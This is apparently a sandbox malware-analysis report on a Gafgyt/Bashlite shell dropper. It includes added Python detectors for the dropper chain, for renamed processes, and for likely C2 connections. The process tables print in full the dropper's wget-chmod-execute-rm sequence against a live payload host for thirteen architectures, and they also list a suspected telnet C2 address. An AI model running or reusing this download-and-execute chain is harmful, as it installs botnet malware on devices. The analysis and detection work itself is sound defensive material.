Analysis Overview
SHA256: bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
Threat Level: Known bad
The file sex.sh was found to be: Known bad.
sex.sh is a shell dropper. In each of the four detonations it runs the same four-step sequence thirteen times, once per payload name (mips, mipsel, sh4, x86, arm61, i686, ppc, 586, m68k, dc, dss, co, scar): wget the file from http://216.172.177.16/, chmod +x it, execute it from /tmp, then rm -rf it. The rm runs after the payload returns, so a payload that daemonizes keeps running from an unlinked file. Only /tmp/arm61 is recorded as a dropped file (MD5 6820e48a7c8f9b287da8f0593b0a8f83, SHA256 eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811). The armhf run is the only one in which a payload stayed alive for the whole window (145 s of kernel time against 4 to 13 s on the other platforms, with a memory dump of the bot process), the only one in which the "Changes its process name" signature fires, and the only one with outbound connections to 5.252.177.70:23 (nineteen of them, on the telnet port).
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt/Bashlite
Executes dropped EXE
Changes its process name
Writes file to tmp directory
Analysis: static1
Detonation Overview
Reported: 2024-08-04 13:39
Signatures: none recorded
Analysis: behavioral1
Detonation Overview
Submitted: 2024-08-04 13:39
Reported: 2024-08-04 13:41
Platform: ubuntu1804-amd64-20240611-en
Max time kernel: 4s
Max time network: 131s
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
| Process | Command line |
| /tmp/sex.sh | /tmp/sex.sh |
| /usr/bin/wget | wget http://216.172.177.16/mips |
| /bin/chmod | chmod +x mips |
| /tmp/mips | ./mips |
| /bin/rm | rm -rf mips |
| /usr/bin/wget | wget http://216.172.177.16/mipsel |
| /bin/chmod | chmod +x mipsel |
| /tmp/mipsel | ./mipsel |
| /bin/rm | rm -rf mipsel |
| /usr/bin/wget | wget http://216.172.177.16/sh4 |
| /bin/chmod | chmod +x sh4 |
| /tmp/sh4 | ./sh4 |
| /bin/rm | rm -rf sh4 |
| /usr/bin/wget | wget http://216.172.177.16/x86 |
| /bin/chmod | chmod +x x86 |
| /tmp/x86 | ./x86 |
| /bin/rm | rm -rf x86 |
| /usr/bin/wget | wget http://216.172.177.16/arm61 |
| /bin/chmod | chmod +x arm61 |
| /tmp/arm61 | ./arm61 |
| /bin/rm | rm -rf arm61 |
| /usr/bin/wget | wget http://216.172.177.16/i686 |
| /bin/chmod | chmod +x i686 |
| /tmp/i686 | ./i686 |
| /bin/rm | rm -rf i686 |
| /usr/bin/wget | wget http://216.172.177.16/ppc |
| /bin/chmod | chmod +x ppc |
| /tmp/ppc | ./ppc |
| /bin/rm | rm -rf ppc |
| /usr/bin/wget | wget http://216.172.177.16/586 |
| /bin/chmod | chmod +x 586 |
| /tmp/586 | ./586 |
| /bin/rm | rm -rf 586 |
| /usr/bin/wget | wget http://216.172.177.16/m68k |
| /bin/chmod | chmod +x m68k |
| /tmp/m68k | ./m68k |
| /bin/rm | rm -rf m68k |
| /usr/bin/wget | wget http://216.172.177.16/dc |
| /bin/chmod | chmod +x dc |
| /tmp/dc | ./dc |
| /bin/rm | rm -rf dc |
| /usr/bin/wget | wget http://216.172.177.16/dss |
| /bin/chmod | chmod +x dss |
| /tmp/dss | ./dss |
| /bin/rm | rm -rf dss |
| /usr/bin/wget | wget http://216.172.177.16/co |
| /bin/chmod | chmod +x co |
| /tmp/co | ./co |
| /bin/rm | rm -rf co |
| /usr/bin/wget | wget http://216.172.177.16/scar |
| /bin/chmod | chmod +x scar |
| /tmp/scar | ./scar |
| /bin/rm | rm -rf scar |
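The process tree above (it is identical in all four runs) is the textbook Gafgyt multi-architecture dropper chain: fetch, chmod +x, execute, delete, repeated for every CPU the botnet targets. The following is an added example, not part of this report or of any sandbox's own code: a detector that groups process events by parent and flags a parent under which several downloaded files were each made executable and run. The ProcEvent records are constructed from the Processes section (the pids are made up), the field layout, the FETCH_RE downloader list and the min_payloads threshold are this example's own choices, and the unrelated wget at the end is there to show that a plain download is not flagged.

```python
"""Flag the fetch -> chmod +x -> execute -> delete chain over process events."""
import ipaddress
import os
import re
from collections import defaultdict
from typing import NamedTuple
from urllib.parse import urlparse


class ProcEvent(NamedTuple):
    pid: int
    ppid: int
    exe: str       # resolved executable, as the sandbox's process list shows it
    cmdline: str   # the bracketed command line from the same list


# Constructed sample (pids made up), modelled on the Processes section: the
# dropper shell runs the chain for two of its thirteen payloads, and an
# unrelated shell fetches a text file from a hostname and never executes it.
SAMPLE_EVENTS = [
    ProcEvent(1000, 1, "/tmp/sex.sh", "/tmp/sex.sh"),
    ProcEvent(1001, 1000, "/usr/bin/wget", "wget http://216.172.177.16/mips"),
    ProcEvent(1002, 1000, "/bin/chmod", "chmod +x mips"),
    ProcEvent(1003, 1000, "/tmp/mips", "./mips"),
    ProcEvent(1004, 1000, "/bin/rm", "rm -rf mips"),
    ProcEvent(1005, 1000, "/usr/bin/wget", "wget http://216.172.177.16/arm61"),
    ProcEvent(1006, 1000, "/bin/chmod", "chmod +x arm61"),
    ProcEvent(1007, 1000, "/tmp/arm61", "./arm61"),
    ProcEvent(1008, 1000, "/bin/rm", "rm -rf arm61"),
    ProcEvent(2000, 1, "/bin/bash", "bash"),
    ProcEvent(2001, 2000, "/usr/bin/wget", "wget https://example.org/notes.txt"),
]

# Downloaders IoT droppers typically use; the URL is the first http/ftp/tftp argument.
FETCH_RE = re.compile(r"^(?:\S*/)?(?:wget|curl|ftpget|tftp)\b.*?\b((?:https?|ftp|tftp)://\S+)")


def _is_bare_ip(host):
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def _makes_executable(mode):
    """True for chmod modes that add execute: +x, a+rx, 755, 0777 ..."""
    if "x" in mode and ("+" in mode or "=" in mode):
        return True
    return bool(re.fullmatch(r"[0-7]{3,4}", mode)) and int(mode[-3:], 8) & 0o111 != 0


def find_dropper_chains(events, min_payloads=2):
    """Return {parent_pid: finding} for each parent under which at least
    min_payloads distinct downloaded files were made executable and run."""
    children = defaultdict(list)
    for ev in events:
        children[ev.ppid].append(ev)

    findings = {}
    for ppid, evs in children.items():
        state = {}  # payload basename -> {"url": str, "steps": set of seen steps}
        for ev in sorted(evs, key=lambda e: e.pid):  # pids grow in spawn order
            argv = ev.cmdline.split()
            if not argv:
                continue
            prog = os.path.basename(argv[0])
            fetched = FETCH_RE.match(ev.cmdline)
            if fetched:
                url = fetched.group(1)
                name = os.path.basename(urlparse(url).path)
                if name:
                    state[name] = {"url": url, "steps": {"fetch"}}
            elif prog == "chmod" and len(argv) > 2 and _makes_executable(argv[1]):
                for target in argv[2:]:
                    if os.path.basename(target) in state:
                        state[os.path.basename(target)]["steps"].add("chmod")
            elif prog == "rm":
                for target in argv[1:]:
                    if os.path.basename(target) in state:
                        state[os.path.basename(target)]["steps"].add("rm")
            elif prog in state and os.path.basename(ev.exe) == prog:
                state[prog]["steps"].add("exec")   # "./mips" run by /tmp/mips

        executed = [n for n, s in state.items() if {"fetch", "chmod", "exec"} <= s["steps"]]
        if len(executed) >= min_payloads:
            hosts = sorted({urlparse(state[n]["url"]).hostname for n in executed})
            findings[ppid] = {
                "payloads": executed,
                "urls": [state[n]["url"] for n in executed],
                "bare_ip_hosts": [h for h in hosts if _is_bare_ip(h)],
                "self_deleting": [n for n in executed if "rm" in state[n]["steps"]],
            }
    return findings


if __name__ == "__main__":
    for ppid, f in find_dropper_chains(SAMPLE_EVENTS).items():
        print(f"parent {ppid}: {len(f['payloads'])} payloads from {f['bare_ip_hosts']} executed")
```

Two design points: the chain is keyed on the downloaded file's basename, which is exactly what the dropper reuses in its chmod, exec and rm steps, and the "executed" set requires fetch, chmod and exec so that an operator who wgets a script and reads it never trips it. Requiring two payloads under one parent is what separates a multi-arch dropper from a one-off install; on a real host the same logic applies to execve events from auditd or eBPF tracing.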
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| GB | 89.187.167.4:443 | | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
The thirteen connections to 216.172.177.16:80 correspond one-to-one to the thirteen wget commands in the process tree. The mDNS multicast entry (224.0.0.251:5353) and the five TLS connections with no recorded domain are not attributed to any sample process in this report; reading them as background traffic of the Ubuntu guest is an inference from the missing domain and process, not something the report states, so confirm against the pcap before using them as indicators.
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |
Analysis: behavioral2
Detonation Overview
Submitted: 2024-08-04 13:39
Reported: 2024-08-04 13:42
Platform: debian9-armhf-20240611-en
Max time kernel: 145s
Max time network: 172s
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
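The "Changes its process name" signature above is the one behaviour in this run that outlives the dropper's rm -rf: once the file is unlinked, /proc/PID/exe still resolves to it with " (deleted)" appended, while /proc/PID/comm and argv[0] show whatever name the bot chose. The following added example (not from this report or the sandbox) applies that check to a snapshot of /proc. The SAMPLE_VIEWS records are constructed; pid 747 is taken from the memory dump name in this run's Files section, but its "sshd" disguise is invented, since the report only records that the name changed.

```python
"""Spot processes whose visible name disagrees with the executable they run."""
import os
from typing import List, NamedTuple


class ProcView(NamedTuple):
    pid: int
    comm: str   # /proc/PID/comm: 15-byte name, settable with prctl(PR_SET_NAME)
    argv0: str  # first field of /proc/PID/cmdline; a process can overwrite it in place
    exe: str    # readlink of /proc/PID/exe; " (deleted)" is appended once the file is unlinked


# Constructed sample. pid 747 mirrors this run's dumped bot process: the report
# records only that it changed its name, so the "sshd" disguise is made up, and
# "(deleted)" follows from the dropper's rm -rf arm61 while the bot is running.
SAMPLE_VIEWS = [
    ProcView(1, "systemd", "/usr/lib/systemd/systemd", "/usr/lib/systemd/systemd"),
    ProcView(612, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd"),
    ProcView(700, "bash", "-bash", "/usr/bin/bash"),            # login shell: argv[0] gets a leading dash
    ProcView(733, "python3", "python3", "/usr/bin/python3.8"),  # interpreter: comm/argv[0] are a prefix of exe
    ProcView(747, "sshd", "/usr/sbin/sshd", "/tmp/arm61 (deleted)"),
]

DELETED = " (deleted)"


def rename_indicators(p: ProcView) -> List[str]:
    """Return the reasons this process looks renamed; empty list means clean."""
    reasons = []
    exe_path = p.exe[:-len(DELETED)] if p.exe.endswith(DELETED) else p.exe
    exe_base = os.path.basename(exe_path)
    if p.exe.endswith(DELETED):
        reasons.append("executable unlinked while running")
    # comm is derived from the exec'd filename and truncated to 15 bytes, so a
    # legitimate comm is a prefix of the exe basename (python3 vs python3.8).
    # A bot that picks a name that happens to be such a prefix slips past this
    # one check; the other two still apply.
    if not exe_base.startswith(p.comm):
        reasons.append(f"comm {p.comm!r} does not match exe {exe_base!r}")
    argv_base = os.path.basename(p.argv0).lstrip("-")   # "-bash" -> "bash"
    if argv_base and not exe_base.startswith(argv_base):
        reasons.append(f"argv[0] {p.argv0!r} does not match exe {exe_base!r}")
    return reasons


def find_renamed(views):
    """{pid: reasons} for every process with at least one indicator."""
    out = {}
    for p in views:
        reasons = rename_indicators(p)
        if reasons:
            out[p.pid] = reasons
    return out


def snapshot_proc():
    """Read the same three fields for every live process. Needs root to read
    other users' exe links; kernel threads have no exe and are skipped."""
    views = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().rstrip("\n")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode("utf-8", "replace")
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            continue
        if argv0:
            views.append(ProcView(pid, comm, argv0, exe))
    return views


if __name__ == "__main__":
    for pid, reasons in find_renamed(snapshot_proc()).items():
        print(pid, "; ".join(reasons))
```

One known benign exception to plan for: on BusyBox-based firmware, where sh, wget and most other utilities are symlinks to a single multicall binary, comm and argv[0] legitimately differ from exe (which resolves to busybox), so allow-list that binary's path before alerting. The "(deleted)" indicator has no such exception on an embedded device that is not mid-upgrade, which makes it the strongest of the three for this sample.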
Processes
| Process | Command line |
| /tmp/sex.sh | /tmp/sex.sh |
| /usr/bin/wget | wget http://216.172.177.16/mips |
| /bin/chmod | chmod +x mips |
| /tmp/mips | ./mips |
| /bin/rm | rm -rf mips |
| /usr/bin/wget | wget http://216.172.177.16/mipsel |
| /bin/chmod | chmod +x mipsel |
| /tmp/mipsel | ./mipsel |
| /bin/rm | rm -rf mipsel |
| /usr/bin/wget | wget http://216.172.177.16/sh4 |
| /bin/chmod | chmod +x sh4 |
| /tmp/sh4 | ./sh4 |
| /bin/rm | rm -rf sh4 |
| /usr/bin/wget | wget http://216.172.177.16/x86 |
| /bin/chmod | chmod +x x86 |
| /tmp/x86 | ./x86 |
| /bin/rm | rm -rf x86 |
| /usr/bin/wget | wget http://216.172.177.16/arm61 |
| /bin/chmod | chmod +x arm61 |
| /tmp/arm61 | ./arm61 |
| /bin/rm | rm -rf arm61 |
| /usr/bin/wget | wget http://216.172.177.16/i686 |
| /bin/chmod | chmod +x i686 |
| /tmp/i686 | ./i686 |
| /bin/rm | rm -rf i686 |
| /usr/bin/wget | wget http://216.172.177.16/ppc |
| /bin/chmod | chmod +x ppc |
| /tmp/ppc | ./ppc |
| /bin/rm | rm -rf ppc |
| /usr/bin/wget | wget http://216.172.177.16/586 |
| /bin/chmod | chmod +x 586 |
| /tmp/586 | ./586 |
| /bin/rm | rm -rf 586 |
| /usr/bin/wget | wget http://216.172.177.16/m68k |
| /bin/chmod | chmod +x m68k |
| /tmp/m68k | ./m68k |
| /bin/rm | rm -rf m68k |
| /usr/bin/wget | wget http://216.172.177.16/dc |
| /bin/chmod | chmod +x dc |
| /tmp/dc | ./dc |
| /bin/rm | rm -rf dc |
| /usr/bin/wget | wget http://216.172.177.16/dss |
| /bin/chmod | chmod +x dss |
| /tmp/dss | ./dss |
| /bin/rm | rm -rf dss |
| /usr/bin/wget | wget http://216.172.177.16/co |
| /bin/chmod | chmod +x co |
| /tmp/co | ./co |
| /bin/rm | rm -rf co |
| /usr/bin/wget | wget http://216.172.177.16/scar |
| /bin/chmod | chmod +x scar |
| /tmp/scar | ./scar |
| /bin/rm | rm -rf scar |
Network
| Country | Destination | Domain | Proto |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
| US | 5.252.177.70:23 | | tcp |
The thirteen connections to 216.172.177.16:80 match the thirteen wget commands in the process tree. The nineteen connections to 5.252.177.70:23 appear in this run only, the one in which a payload process stayed alive for the full 145 s kernel window and had its memory dumped; repeated raw TCP to the telnet port of a bare IP with no domain is the pattern of a Gafgyt bot reconnecting to its controller. The report itself does not attribute these connections to /tmp/arm61, so that attribution is an inference from the timing and from the absence of any other long-lived process.
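This run's Network table lists one row per connection, which hides the shape of the traffic. The following is an added example, not from the report or the sandbox: it collapses connection rows by destination, counts them, and tags each destination using the download URLs from the Processes section, so the thirteen payload fetches and the nineteen raw TCP connections to port 23 stand out from a long table. The Conn records are constructed to match this run's table, the tag names and beacon_threshold are this example's own choices, and destinations are assumed to be IPv4 "ip:port" strings, which is all this report contains.

```python
"""Collapse per-connection sandbox rows into per-destination rows and tag them."""
import ipaddress
from collections import Counter
from typing import NamedTuple
from urllib.parse import urlparse


class Conn(NamedTuple):
    country: str
    dst: str      # "ip:port"; IPv4 assumed (the report records no IPv6)
    domain: str   # "" where the sandbox recorded none
    proto: str


# Constructed to match this run's Network table: 13 rows to the payload
# server and 19 rows to 5.252.177.70:23.
SAMPLE_CONNS = (
    [Conn("US", "216.172.177.16:80", "216.172.177.16", "tcp")] * 13
    + [Conn("US", "5.252.177.70:23", "", "tcp")] * 19
)

WEB_PORTS = {80, 443, 8080, 8443}


def _url_endpoint(url):
    """'http://216.172.177.16/arm61' -> '216.172.177.16:80'"""
    p = urlparse(url)
    port = p.port or (443 if p.scheme == "https" else 80)
    return f"{p.hostname}:{port}"


def summarize(conns, download_urls=(), beacon_threshold=5):
    """One row per (dst, domain, proto) with a count and tags, busiest first.
    payload-server    dst is the host:port of a URL the dropper fetched
    multicast         local discovery (mDNS, SSDP); never a remote indicator
    c2-candidate      repeated raw TCP to a bare IP on a non-web port, no domain
    unattributed-tls  port 443 with no recorded domain; check the pcap first"""
    payload_endpoints = {_url_endpoint(u) for u in download_urls}
    counts = Counter((c.dst, c.domain, c.proto) for c in conns)
    rows = []
    for (dst, domain, proto), n in counts.items():
        ip, _, port = dst.rpartition(":")
        port = int(port)
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            addr = None   # a hostname:port from another tool; only the URL match applies
        tags = []
        if dst in payload_endpoints:
            tags.append("payload-server")
        if addr is not None and addr.is_multicast:
            tags.append("multicast")
        elif (addr is not None and port not in WEB_PORTS and not domain
              and n >= beacon_threshold):
            tags.append("c2-candidate")
        elif port == 443 and not domain:
            tags.append("unattributed-tls")
        rows.append({"dst": dst, "proto": proto, "domain": domain, "count": n, "tags": tags})
    rows.sort(key=lambda r: -r["count"])
    return rows


if __name__ == "__main__":
    for row in summarize(SAMPLE_CONNS, download_urls=["http://216.172.177.16/arm61"]):
        print(f"{row['count']:3d}  {row['dst']:22s} {row['proto']}  {','.join(row['tags'])}")
```

Feeding the same function the Ubuntu run's rows would tag 224.0.0.251:5353 as multicast and the four domain-less port-443 destinations as unattributed-tls, which is the right level of confidence for them: worth a look in the pcap, not worth a block rule.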
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |
memory/747-1-0xb66ba000-0xb66cb044-memory.dmp (memory dump of pid 747)
Analysis: behavioral3
Detonation Overview
Submitted: 2024-08-04 13:39
Reported: 2024-08-04 13:41
Platform: debian9-mipsbe-20240611-en
Max time kernel: 13s
Max time network: 15s
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
| Process | Command line |
| /tmp/sex.sh | /tmp/sex.sh |
| /usr/bin/wget | wget http://216.172.177.16/mips |
| /bin/chmod | chmod +x mips |
| /tmp/mips | ./mips |
| /bin/rm | rm -rf mips |
| /usr/bin/wget | wget http://216.172.177.16/mipsel |
| /bin/chmod | chmod +x mipsel |
| /tmp/mipsel | ./mipsel |
| /bin/rm | rm -rf mipsel |
| /usr/bin/wget | wget http://216.172.177.16/sh4 |
| /bin/chmod | chmod +x sh4 |
| /tmp/sh4 | ./sh4 |
| /bin/rm | rm -rf sh4 |
| /usr/bin/wget | wget http://216.172.177.16/x86 |
| /bin/chmod | chmod +x x86 |
| /tmp/x86 | ./x86 |
| /bin/rm | rm -rf x86 |
| /usr/bin/wget | wget http://216.172.177.16/arm61 |
| /bin/chmod | chmod +x arm61 |
| /tmp/arm61 | ./arm61 |
| /bin/rm | rm -rf arm61 |
| /usr/bin/wget | wget http://216.172.177.16/i686 |
| /bin/chmod | chmod +x i686 |
| /tmp/i686 | ./i686 |
| /bin/rm | rm -rf i686 |
| /usr/bin/wget | wget http://216.172.177.16/ppc |
| /bin/chmod | chmod +x ppc |
| /tmp/ppc | ./ppc |
| /bin/rm | rm -rf ppc |
| /usr/bin/wget | wget http://216.172.177.16/586 |
| /bin/chmod | chmod +x 586 |
| /tmp/586 | ./586 |
| /bin/rm | rm -rf 586 |
| /usr/bin/wget | wget http://216.172.177.16/m68k |
| /bin/chmod | chmod +x m68k |
| /tmp/m68k | ./m68k |
| /bin/rm | rm -rf m68k |
| /usr/bin/wget | wget http://216.172.177.16/dc |
| /bin/chmod | chmod +x dc |
| /tmp/dc | ./dc |
| /bin/rm | rm -rf dc |
| /usr/bin/wget | wget http://216.172.177.16/dss |
| /bin/chmod | chmod +x dss |
| /tmp/dss | ./dss |
| /bin/rm | rm -rf dss |
| /usr/bin/wget | wget http://216.172.177.16/co |
| /bin/chmod | chmod +x co |
| /tmp/co | ./co |
| /bin/rm | rm -rf co |
| /usr/bin/wget | wget http://216.172.177.16/scar |
| /bin/chmod | chmod +x scar |
| /tmp/scar | ./scar |
| /bin/rm | rm -rf scar |
Network
| Country | Destination | Domain | Proto |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |
Analysis: behavioral4
Detonation Overview
Submitted: 2024-08-04 13:39
Reported: 2024-08-04 13:41
Platform: debian9-mipsel-20240418-en
Max time kernel: 13s
Max time network: 15s
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/arm61 | /tmp/arm61 | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/arm61 | /usr/bin/wget | N/A |
Processes
| Process | Command line |
| /tmp/sex.sh | /tmp/sex.sh |
| /usr/bin/wget | wget http://216.172.177.16/mips |
| /bin/chmod | chmod +x mips |
| /tmp/mips | ./mips |
| /bin/rm | rm -rf mips |
| /usr/bin/wget | wget http://216.172.177.16/mipsel |
| /bin/chmod | chmod +x mipsel |
| /tmp/mipsel | ./mipsel |
| /bin/rm | rm -rf mipsel |
| /usr/bin/wget | wget http://216.172.177.16/sh4 |
| /bin/chmod | chmod +x sh4 |
| /tmp/sh4 | ./sh4 |
| /bin/rm | rm -rf sh4 |
| /usr/bin/wget | wget http://216.172.177.16/x86 |
| /bin/chmod | chmod +x x86 |
| /tmp/x86 | ./x86 |
| /bin/rm | rm -rf x86 |
| /usr/bin/wget | wget http://216.172.177.16/arm61 |
| /bin/chmod | chmod +x arm61 |
| /tmp/arm61 | ./arm61 |
| /bin/rm | rm -rf arm61 |
| /usr/bin/wget | wget http://216.172.177.16/i686 |
| /bin/chmod | chmod +x i686 |
| /tmp/i686 | ./i686 |
| /bin/rm | rm -rf i686 |
| /usr/bin/wget | wget http://216.172.177.16/ppc |
| /bin/chmod | chmod +x ppc |
| /tmp/ppc | ./ppc |
| /bin/rm | rm -rf ppc |
| /usr/bin/wget | wget http://216.172.177.16/586 |
| /bin/chmod | chmod +x 586 |
| /tmp/586 | ./586 |
| /bin/rm | rm -rf 586 |
| /usr/bin/wget | wget http://216.172.177.16/m68k |
| /bin/chmod | chmod +x m68k |
| /tmp/m68k | ./m68k |
| /bin/rm | rm -rf m68k |
| /usr/bin/wget | wget http://216.172.177.16/dc |
| /bin/chmod | chmod +x dc |
| /tmp/dc | ./dc |
| /bin/rm | rm -rf dc |
| /usr/bin/wget | wget http://216.172.177.16/dss |
| /bin/chmod | chmod +x dss |
| /tmp/dss | ./dss |
| /bin/rm | rm -rf dss |
| /usr/bin/wget | wget http://216.172.177.16/co |
| /bin/chmod | chmod +x co |
| /tmp/co | ./co |
| /bin/rm | rm -rf co |
| /usr/bin/wget | wget http://216.172.177.16/scar |
| /bin/chmod | chmod +x scar |
| /tmp/scar | ./scar |
| /bin/rm | rm -rf scar |
Network
| Country | Destination | Domain | Proto |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
| US | 216.172.177.16:80 | 216.172.177.16 | tcp |
Files
/tmp/arm61
| MD5 | 6820e48a7c8f9b287da8f0593b0a8f83 |
| SHA1 | 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f |
| SHA256 | eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811 |
| SHA512 | 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c |